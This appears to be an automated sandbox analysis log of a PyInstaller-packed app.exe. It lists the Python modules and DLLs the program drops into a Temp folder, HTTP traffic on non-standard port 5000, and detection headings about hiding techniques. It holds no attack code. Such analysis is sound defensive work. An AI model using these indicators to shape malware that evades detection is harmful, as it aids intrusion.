    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_cffi_backend.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\select.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l2-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_generator.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cfb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD5.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des3.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\python38.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Math\_modexp.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ctr.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_bounded_integers.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_rust.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32evtlog.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\backend_c.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32api.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA384.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA1.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_philox.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_portable.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_umath.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-util-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_bz2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_overlapped.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32pdh.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cbc.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_brotli.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA512.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ecb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_multiprocessing.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_RIPEMD160.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_hashlib.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ec_ws.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_strxor.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA256.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_tests.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_sfc64.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2b.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_elementtree.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_ctypes.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_poly1305.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\libcrypto-1_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_lzma.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_keccak.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-console-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\libffi-7.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\simplejson\_speedups.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_pcg64.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\libssl-1_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_cpuid_c.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA224.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\pywintypes38.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_win32sysloader.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\_umath_linalg.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32wnet.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\psutil\_psutil_windows.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aesni.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed25519.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\bit_generator.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_clmul.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\MSVCP140.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_asyncio.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\VCRUNTIME140.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_queue.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\VCRUNTIME140_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cast.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed448.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_chacha20.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\pyexpat.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\python3.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Protocol\_scrypt.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_openssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\lapack_lite.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD4.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_mt19937.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_ssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft\_pocketfft_internal.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\unicodedata.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ofb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aes.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ocb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_common.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\_cffi.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_arc2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_socket.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\ucrtbase.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\mtrand.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_decimal.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_x25519.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2s.pydJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49707
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE83DD0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7ACE83DD0
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\bcrypt\_bcrypt.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_cffi_backend.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\select.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l2-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_generator.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cfb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD5.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des3.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\python38.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Math\_modexp.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ctr.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_bounded_integers.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_rust.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\win32evtlog.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\backend_c.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\win32api.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA384.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA1.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_portable.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_philox.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_umath.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-util-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_bz2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_overlapped.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\win32pdh.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cbc.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_brotli.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA512.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ecb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_multiprocessing.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_RIPEMD160.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_hashlib.pydJump to dropped file
